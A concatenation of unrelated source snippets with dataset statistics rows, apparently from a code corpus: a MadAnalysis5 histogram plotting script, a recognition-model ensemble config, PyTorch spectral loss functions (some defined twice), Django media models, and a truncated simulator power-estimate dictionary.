label="$bg\_dip\_1200\_1600$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#f2f2f2", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y13_PT_0_weights+y13_PT_1_weights+y13_PT_2_weights+y13_PT_3_weights+y13_PT_4_weights+y13_PT_5_weights+y13_PT_6_weights+y13_PT_7_weights+y13_PT_8_weights+y13_PT_9_weights+y13_PT_10_weights+y13_PT_11_weights+y13_PT_12_weights+y13_PT_13_weights+y13_PT_14_weights,\
label="$bg\_dip\_800\_1200$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#ccc6aa", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y13_PT_0_weights+y13_PT_1_weights+y13_PT_2_weights+y13_PT_3_weights+y13_PT_4_weights+y13_PT_5_weights+y13_PT_6_weights+y13_PT_7_weights+y13_PT_8_weights+y13_PT_9_weights+y13_PT_10_weights+y13_PT_11_weights+y13_PT_12_weights+y13_PT_13_weights,\
label="$bg\_dip\_600\_800$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#ccc6aa", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y13_PT_0_weights+y13_PT_1_weights+y13_PT_2_weights+y13_PT_3_weights+y13_PT_4_weights+y13_PT_5_weights+y13_PT_6_weights+y13_PT_7_weights+y13_PT_8_weights+y13_PT_9_weights+y13_PT_10_weights+y13_PT_11_weights+y13_PT_12_weights,\
label="$bg\_dip\_400\_600$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#c1bfa8", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y13_PT_0_weights+y13_PT_1_weights+y13_PT_2_weights+y13_PT_3_weights+y13_PT_4_weights+y13_PT_5_weights+y13_PT_6_weights+y13_PT_7_weights+y13_PT_8_weights+y13_PT_9_weights+y13_PT_10_weights+y13_PT_11_weights,\
label="$bg\_dip\_200\_400$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#bab5a3", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y13_PT_0_weights+y13_PT_1_weights+y13_PT_2_weights+y13_PT_3_weights+y13_PT_4_weights+y13_PT_5_weights+y13_PT_6_weights+y13_PT_7_weights+y13_PT_8_weights+y13_PT_9_weights+y13_PT_10_weights,\
label="$bg\_dip\_100\_200$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#b2a596", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y13_PT_0_weights+y13_PT_1_weights+y13_PT_2_weights+y13_PT_3_weights+y13_PT_4_weights+y13_PT_5_weights+y13_PT_6_weights+y13_PT_7_weights+y13_PT_8_weights+y13_PT_9_weights,\
label="$bg\_dip\_0\_100$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#b7a39b", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y13_PT_0_weights+y13_PT_1_weights+y13_PT_2_weights+y13_PT_3_weights+y13_PT_4_weights+y13_PT_5_weights+y13_PT_6_weights+y13_PT_7_weights+y13_PT_8_weights,\
label="$bg\_vbf\_1600\_inf$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#ad998c", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y13_PT_0_weights+y13_PT_1_weights+y13_PT_2_weights+y13_PT_3_weights+y13_PT_4_weights+y13_PT_5_weights+y13_PT_6_weights+y13_PT_7_weights,\
label="$bg\_vbf\_1200\_1600$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#9b8e82", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y13_PT_0_weights+y13_PT_1_weights+y13_PT_2_weights+y13_PT_3_weights+y13_PT_4_weights+y13_PT_5_weights+y13_PT_6_weights,\
label="$bg\_vbf\_800\_1200$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#876656", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y13_PT_0_weights+y13_PT_1_weights+y13_PT_2_weights+y13_PT_3_weights+y13_PT_4_weights+y13_PT_5_weights,\
label="$bg\_vbf\_600\_800$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#afcec6", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y13_PT_0_weights+y13_PT_1_weights+y13_PT_2_weights+y13_PT_3_weights+y13_PT_4_weights,\
label="$bg\_vbf\_400\_600$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#84c1a3", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y13_PT_0_weights+y13_PT_1_weights+y13_PT_2_weights+y13_PT_3_weights,\
label="$bg\_vbf\_200\_400$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#89a8a0", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y13_PT_0_weights+y13_PT_1_weights+y13_PT_2_weights,\
label="$bg\_vbf\_100\_200$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#829e8c", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y13_PT_0_weights+y13_PT_1_weights,\
label="$bg\_vbf\_0\_100$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#adbcc6", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y13_PT_0_weights,\
label="$signal$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#7a8e99", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
# Axis
plt.rc('text',usetex=False)
plt.xlabel(r"p_{T} [ a_{2} ] ( GeV ) ",\
fontsize=16,color="black")
plt.ylabel(r"$\mathrm{Events}$ $(\mathcal{L}_{\mathrm{int}} = 150.0\ \mathrm{fb}^{-1})$ ",\
fontsize=16,color="black")
# Boundary of y-axis
ymax=(y13_PT_0_weights+y13_PT_1_weights+y13_PT_2_weights+y13_PT_3_weights+y13_PT_4_weights+y13_PT_5_weights+y13_PT_6_weights+y13_PT_7_weights+y13_PT_8_weights+y13_PT_9_weights+y13_PT_10_weights+y13_PT_11_weights+y13_PT_12_weights+y13_PT_13_weights+y13_PT_14_weights+y13_PT_15_weights+y13_PT_16_weights).max()*1.1
#ymin=0 # linear scale
ymin=min([x for x in (y13_PT_0_weights+y13_PT_1_weights+y13_PT_2_weights+y13_PT_3_weights+y13_PT_4_weights+y13_PT_5_weights+y13_PT_6_weights+y13_PT_7_weights+y13_PT_8_weights+y13_PT_9_weights+y13_PT_10_weights+y13_PT_11_weights+y13_PT_12_weights+y13_PT_13_weights+y13_PT_14_weights+y13_PT_15_weights+y13_PT_16_weights) if x])/100. # log scale
plt.gca().set_ylim(ymin,ymax)
# Log/Linear scale for X-axis
plt.gca().set_xscale("linear")
#plt.gca().set_xscale("log",nonposx="clip")
# Log/Linear scale for Y-axis
#plt.gca().set_yscale("linear")
plt.gca().set_yscale("log",nonposy="clip")
# Legend
plt.legend(bbox_to_anchor=(1.05,1), loc=2, borderaxespad=0.)
# Saving the image
plt.savefig('../../HTML/MadAnalysis5job_0/selection_12.png')
plt.savefig('../../PDF/MadAnalysis5job_0/selection_12.png')
plt.savefig('../../DVI/MadAnalysis5job_0/selection_12.eps')
# Running!
if __name__ == '__main__':
selection_12()
| 306.010309 | 5,718 | 0.704444 | 16,212 | 59,366 | 2.534481 | 0.118801 | 0.506364 | 0.741366 | 0.965027 | 0.446884 | 0.419139 | 0.416924 | 0.405875 | 0.399596 | 0.395994 | 0 | 0.600094 | 0.027878 | 59,366 | 193 | 5,719 | 307.595855 | 0.111885 | 0.016525 | 0 | 0.185841 | 0 | 0.00885 | 0.017892 | 0.003479 | 0 | 0 | 0 | 0 | 0 | 1 | 0.00885 | false | 0 | 0.035398 | 0 | 0.044248 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4b8d048dccc653e740f0f9f42e336d4dff348559 | 1,626 | py | Python | src/config/en_config.py | bestfitting/instance_level_recognition | 683f021b4e65876835f028797ec28b0d1071bb45 | [
"Apache-2.0"
] | 103 | 2020-10-20T13:23:35.000Z | 2022-03-27T15:08:41.000Z | src/config/en_config.py | solomonkimunyu/instance_level_recognition | 683f021b4e65876835f028797ec28b0d1071bb45 | [
"Apache-2.0"
] | 3 | 2020-10-29T03:06:51.000Z | 2022-02-12T02:44:57.000Z | src/config/en_config.py | solomonkimunyu/instance_level_recognition | 683f021b4e65876835f028797ec28b0d1071bb45 | [
"Apache-2.0"
] | 23 | 2020-10-21T00:50:29.000Z | 2022-03-09T16:01:57.000Z | en_m4_b7_b6_b5_r152_i800 = [
# b7,
{
'is_20191st': False,
'module': 'efficientnet_gem_fc_face',
'model_name': 'class_efficientnet_b7_gem_fc_arcface2_1head',
'out_dir': 'v2x_sgd_ls_aug3b_norm1_0918_class_efficientnet_b7_gem_fc_arcface2_1head_i736',
'predict_epoch': '26.80',
'img_size': 800,
'batch_size': 4,
'num_classes': 81313,
'in_channels': 3,
'preprocessing': True,
'weight': 0.6,
},
{
'is_20191st': False,
'module': 'efficientnet_gem_fc_face',
'model_name': 'class_efficientnet_b6_gem_fc_arcface2_1head',
'out_dir': 'v2x_sgd_ls_aug3b_norm1_0919_class_efficientnet_b6_gem_fc_arcface2_1head_i736',
'predict_epoch': '21.70',
'img_size': 800,
'batch_size': 4,
'num_classes': 81313,
'in_channels': 3,
'preprocessing': True,
'weight': 0.2,
},
{
'is_20191st': False,
'module': 'efficientnet_gem_fc_face',
'model_name': 'class_efficientnet_b5_gem_fc_arcface2_1head',
'out_dir': 'v2x_sgd_ls_aug3b_norm1_0918_class_efficientnet_b5_gem_fc_arcface2_1head_i736',
'predict_epoch': '19.30',
'img_size': 800,
'batch_size': 4,
'num_classes': 81313,
'in_channels': 3,
'preprocessing': True,
'weight': 0.1,
},
{
'is_20191st': False,
'module': 'resnet_gem_fc_face',
'model_name': 'class_resnet152_gem_fc_arcface_1head',
'out_dir': 'v2x_sgd_ls_aug3b_norm1_0919_class_resnet152_gem_fc_arcface_1head_i736',
'predict_epoch': '17.90',
'img_size': 800,
'batch_size': 4,
'num_classes': 81313,
'in_channels': 3,
'preprocessing': True,
'weight': 0.1,
},
] | 29.563636 | 94 | 0.675277 | 222 | 1,626 | 4.387387 | 0.274775 | 0.061602 | 0.080082 | 0.110883 | 0.917864 | 0.917864 | 0.845996 | 0.716632 | 0.716632 | 0.716632 | 0 | 0.120962 | 0.181427 | 1,626 | 55 | 95 | 29.563636 | 0.610819 | 0.001845 | 0 | 0.537037 | 0 | 0 | 0.611591 | 0.329223 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4b951ced25384d90524e9918f71c85e35c75f75d | 7,736 | py | Python | PIRM_VIDAR_final_code/track1/tools/loss.py | contstriver/DRAN | 49ec70d1535a1a0a5839edb4b408be212644503b | [
"Apache-2.0"
] | null | null | null | PIRM_VIDAR_final_code/track1/tools/loss.py | contstriver/DRAN | 49ec70d1535a1a0a5839edb4b408be212644503b | [
"Apache-2.0"
] | null | null | null | PIRM_VIDAR_final_code/track1/tools/loss.py | contstriver/DRAN | 49ec70d1535a1a0a5839edb4b408be212644503b | [
"Apache-2.0"
] | null | null | null | #!/usr/local/bin/python
from __future__ import division
import torch
import random
import torch.nn as nn
import torch.optim as optim
from torch.autograd import Variable
class reconstruct_loss(nn.Module):
"""the loss between the input and synthesized input"""
def __init__(self, cie_matrix, batchsize):
super(reconstruct_loss, self).__init__()
self.cie = Variable(torch.from_numpy(cie_matrix).float().cuda(), requires_grad=False)
self.batchsize = batchsize
def forward(self, network_input, network_output):
network_output = network_output.permute(3, 2, 0, 1)
network_output = network_output.contiguous().view(-1, 31)
reconsturct_input = torch.mm(network_output,self.cie)
reconsturct_input = reconsturct_input.view(50, 50, 64, 3)
reconsturct_input = reconsturct_input.permute(2,3,1,0)
reconstruction_loss = torch.mean(torch.abs(reconsturct_input - network_input))
return reconstruction_loss
def rrmse_loss(outputs, label):
"""Computes the rrmse value"""
error = torch.abs(outputs-label)/(label + 1/65535) #1/65536 = 1.5e-5
rrmse = torch.mean(error.view(-1))
return rrmse
def rrmse_loss2(outputs, label):
"""Computes the rrmse value"""
zeros = torch.zeros(outputs.shape)
outputs = torch.where(outputs>1/65535,outputs,zeros.cuda())
error = torch.abs(outputs-label)/(label + 1/65535) #1/65536 = 1.5e-5
rrmse = torch.mean(error.view(-1))
return rrmse
def rrmse_loss3(outputs, label):
"""Computes the rrmse value"""
zeros = torch.zeros(outputs.shape)
ones = torch.ones(outputs.shape)*1/65535
twos = torch.ones(outputs.shape)*2/65535
outputs = torch.where(outputs>1/65535,outputs,zeros.cuda())
outputs = torch.where((outputs>2/65535)|(outputs<1/65535),outputs,ones.cuda())
outputs = torch.where((outputs>3/65535)|(outputs<2/65535),outputs,twos.cuda())
error = torch.abs(outputs-label)/(label + 1/65535) #1/65536 = 1.5e-5
rrmse = torch.mean(error.view(-1))
return rrmse
def rrmse_loss_round(outputs, label):
"""Computes the rrmse value"""
outputs = torch.clamp(outputs*65535,max=65535,min=0)
outputs = torch.round(outputs)
error = torch.abs(outputs-label)/(label + 1) #1/65536 = 1.5e-5
rrmse = torch.mean(error.view(-1))
return rrmse
def rrmse_loss_ceil(outputs, label):
"""Computes the rrmse value"""
outputs = torch.clamp(outputs*65535,max=65535,min=0)
outputs = torch.ceil(outputs)-1
error = torch.abs(outputs-label)/(label + 1) #1/65536 = 1.5e-5
rrmse = torch.mean(error.view(-1))
return rrmse
def rrmse_loss_con(outputs, label):
"""Computes the rrmse value"""
zeros = torch.zeros(outputs.shape)
outputs = torch.clamp(outputs*65535,max=65535,min=0)
outputs = torch.round(torch.where(outputs>1,outputs,zeros.cuda()))
error = torch.abs(outputs-label)/(label + 1) #1/65536 = 1.5e-5
rrmse = torch.mean(error.view(-1))
return rrmse
def sid_loss(output, target):
"""For the network, the input image dimension is BxCxHxW"""
a = torch.sum(torch.sum(output* torch.log10(torch.clamp((output + 1e-3/65536)/(target + 1e-3/65536),min=1e-8)),3),2)
b = torch.sum(torch.sum(target* torch.log10(torch.clamp((target+ 1e-3/65536)/(output+ 1e-3/65536),min=1e-8)),3),2)
sid = torch.sum(torch.abs(a + b))/(target.shape[0]*target.shape[1]*target.shape[2] * target.shape[3])
return sid
def test_sid_loss(output, target):
"""For the network, the input image dimension is BxCxHxW"""
a = torch.sum(torch.sum(output* torch.log10(torch.clamp((output + 1e-3)/(target + 1e-3),min=1e-8)),3),2)
b = torch.sum(torch.sum(target* torch.log10(torch.clamp((target+ 1e-3)/(output+ 1e-3),min=1e-8)),3),2)
sid = torch.sum(torch.abs(a + b))/(target.shape[0]*target.shape[1]*target.shape[2] * target.shape[3])
return sid
def appsa_loss(output, target):
nom = torch.sum(target* output, dim=1)
denom = torch.norm(target,2,1) * torch.norm(output,2,1)
cos = torch.clamp(nom/(denom + 1e-3/65536), max=1)
appsa = torch.acos(torch.clamp(cos,min=1e-8))
appsa = torch.sum(appsa.view(-1))/(target.shape[0]*target.shape[2] * target.shape[3])
return appsa
def test_appsa_loss(output, target):
nom = torch.sum(target* output, dim=1)
denom = torch.norm(target,2,1) * torch.norm(output,2,1)
cos = torch.clamp(nom/(denom + 1e-3), max=1)
appsa = torch.acos(torch.clamp(cos,min=1e-8))
appsa = torch.sum(appsa.view(-1))/(target.shape[0]*target.shape[2] * target.shape[3])
return appsa
def tvloss(output, tv_weight):
"""Computes the total variation loss"""
diff_i = torch.sum(torch.abs(output[:, :, :, 1:] - output[:, :, :, :-1]))
diff_j = torch.sum(torch.abs(output[:, :, 1:, :] - output[:, :, :-1, :]))
tv_loss = tv_weight*(diff_i + diff_j)
return tv_loss
def rrmse_loss_round(outputs, label):
"""Computes the rrmse value"""
outputs = torch.clamp(outputs*65535,max=65535,min=0)
outputs = torch.round(outputs)
error = torch.abs(outputs-label)/(label + 1) #1/65536 = 1.5e-5
rrmse = torch.mean(error.view(-1))
return rrmse
def rrmse_loss_ceil(outputs, label):
"""Computes the rrmse value"""
outputs = torch.clamp(outputs*65535,max=65535,min=0)
outputs = torch.ceil(outputs)-1
error = torch.abs(outputs-label)/(label + 1) #1/65536 = 1.5e-5
rrmse = torch.mean(error.view(-1))
return rrmse
def rrmse_loss_con(outputs, label):
"""Computes the rrmse value"""
zeros = torch.zeros(outputs.shape)
outputs = torch.clamp(outputs*65535,max=65535,min=0)
outputs = torch.round(torch.where(outputs>1,outputs,zeros.cuda()))
error = torch.abs(outputs-label)/(label + 1) #1/65536 = 1.5e-5
rrmse = torch.mean(error.view(-1))
return rrmse
def sid_loss(output, target):
"""For the network, the input image dimension is BxCxHxW"""
a = torch.sum(torch.sum(output* torch.log10(torch.clamp((output + 1e-3/65536)/(target + 1e-3/65536),min=1e-8)),3),2)
b = torch.sum(torch.sum(target* torch.log10(torch.clamp((target+ 1e-3/65536)/(output+ 1e-3/65536),min=1e-8)),3),2)
sid = torch.sum(torch.abs(a + b))/(target.shape[0]*target.shape[1]*target.shape[2] * target.shape[3])
return sid
def test_sid_loss(output, target):
"""For the network, the input image dimension is BxCxHxW"""
a = torch.sum(torch.sum(output* torch.log10(torch.clamp((output + 1e-3)/(target + 1e-3),min=1e-8)),3),2)
b = torch.sum(torch.sum(target* torch.log10(torch.clamp((target+ 1e-3)/(output+ 1e-3),min=1e-8)),3),2)
sid = torch.sum(torch.abs(a + b))/(target.shape[0]*target.shape[1]*target.shape[2] * target.shape[3])
return sid
def appsa_loss(output, target):
nom = torch.sum(target* output, dim=1)
denom = torch.norm(target,2,1) * torch.norm(output,2,1)
cos = torch.clamp(nom/(denom + 1e-3/65536), max=1)
appsa = torch.acos(torch.clamp(cos,min=1e-8))
appsa = torch.sum(appsa.view(-1))/(target.shape[0]*target.shape[2] * target.shape[3])
return appsa
def test_appsa_loss(output, target):
nom = torch.sum(target* output, dim=1)
denom = torch.norm(target,2,1) * torch.norm(output,2,1)
cos = torch.clamp(nom/(denom + 1e-3), max=1)
appsa = torch.acos(torch.clamp(cos,min=1e-8))
appsa = torch.sum(appsa.view(-1))/(target.shape[0]*target.shape[2] * target.shape[3])
return appsa
def tvloss(output, tv_weight):
"""Computes the total variation loss"""
diff_i = torch.sum(torch.abs(output[:, :, :, 1:] - output[:, :, :, :-1]))
diff_j = torch.sum(torch.abs(output[:, :, 1:, :] - output[:, :, :-1, :]))
tv_loss = tv_weight*(diff_i + diff_j)
return tv_loss
| 43.460674 | 120 | 0.659902 | 1,204 | 7,736 | 4.17608 | 0.089701 | 0.050915 | 0.041368 | 0.041169 | 0.83572 | 0.825378 | 0.818815 | 0.818815 | 0.818815 | 0.806086 | 0 | 0.071451 | 0.164168 | 7,736 | 177 | 121 | 43.706215 | 0.706155 | 0.093588 | 0 | 0.807407 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.155556 | false | 0 | 0.044444 | 0 | 0.355556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
29e38561d157f63e390191afb73027bfd7af6f4a | 2,143 | py | Python | ideas/models.py | Adstefnum/ScrapBook | 8391e86daf678f64a30dd693e34cd69939b6fe0d | [
"MIT"
] | null | null | null | ideas/models.py | Adstefnum/ScrapBook | 8391e86daf678f64a30dd693e34cd69939b6fe0d | [
"MIT"
] | null | null | null | ideas/models.py | Adstefnum/ScrapBook | 8391e86daf678f64a30dd693e34cd69939b6fe0d | [
"MIT"
] | null | null | null | from django.db import models
from django.core.files.storage import FileSystemStorage
CAT_CHOICES = (
('tech','TECH'),
('class_mus','CLASSICAL MUSIC'),
('gen','GENERAL'),
('gen_music','GENERAL MUSIC'),
('novels','NOVELS'),
('physics','PHYSICS'),
('maths','MATHS'),
)
class Video(models.Model):
file_pic = models.FileField(storage=FileSystemStorage(location='/media/image/'),upload_to='image',default='/media/image/')
cat_name = models.CharField(max_length=30, choices=CAT_CHOICES, default='notes')
file_name = models.CharField(max_length=100)
file = models.FileField(storage=FileSystemStorage(location='/media/video/'),upload_to='video',default='/media/video/')
last_date = models.DateField()
def __str__(self):
return self.file_name
class Audio(models.Model):
file_pic = models.FileField(storage=FileSystemStorage(location='/media/image/'),upload_to='image',default='/media/image/')
cat_name = models.CharField(max_length=30, choices=CAT_CHOICES, default='notes')
file_name = models.CharField(max_length=100)
file = models.FileField(storage=FileSystemStorage(location='/media/audio/'),upload_to='audio')
last_date = models.DateField()
def __str__(self):
return self.file_name
class Image(models.Model):
file_pic = models.FileField(storage=FileSystemStorage(location='/media/image/'),upload_to='image',default='/media/image/')
cat_name = models.CharField(max_length=30, choices=CAT_CHOICES, default='notes')
file_name = models.CharField(max_length=100)
file = models.FileField(storage=FileSystemStorage(location='/media/images/'),upload_to='images')
last_date = models.DateField()
def __str__(self):
return self.file_name
class Note(models.Model):
file_pic = models.FileField(storage=FileSystemStorage(location='/media/image/'),upload_to='image',default='/media/image/')
cat_name = models.CharField(max_length=30, choices=CAT_CHOICES, default='notes')
file_name = models.CharField(max_length=100)
file = models.FileField(storage=FileSystemStorage(location='/media/notes/'),upload_to='notes')
last_date = models.DateField()
def __str__(self):
return self.file_name | 38.267857 | 123 | 0.748483 | 275 | 2,143 | 5.618182 | 0.178182 | 0.07767 | 0.113916 | 0.201942 | 0.809709 | 0.809709 | 0.809709 | 0.809709 | 0.809709 | 0.809709 | 0 | 0.010256 | 0.090061 | 2,143 | 56 | 124 | 38.267857 | 0.782051 | 0 | 0 | 0.55814 | 0 | 0 | 0.154384 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.093023 | false | 0 | 0.046512 | 0.093023 | 0.790698 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
d9a9b5e70d454db4f3bd6755d13b70999d6b1425 | 68,637 | py | Python | benchmarks/SimResults/combinations_spec_ml_fulltrained/old/cmp_bwavesgcccactusADMmilc/power.py | TugberkArkose/MLScheduler | e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061 | [
"Unlicense"
] | null | null | null | benchmarks/SimResults/combinations_spec_ml_fulltrained/old/cmp_bwavesgcccactusADMmilc/power.py | TugberkArkose/MLScheduler | e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061 | [
"Unlicense"
] | null | null | null | benchmarks/SimResults/combinations_spec_ml_fulltrained/old/cmp_bwavesgcccactusADMmilc/power.py | TugberkArkose/MLScheduler | e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061 | [
"Unlicense"
] | null | null | null | power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.134375,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.308232,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.791398,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.347161,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.601157,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.34478,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.2931,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.221822,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 6.68559,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.149512,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0125848,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.138639,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0930726,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.288151,
'Execution Unit/Register Files/Runtime Dynamic': 0.105657,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
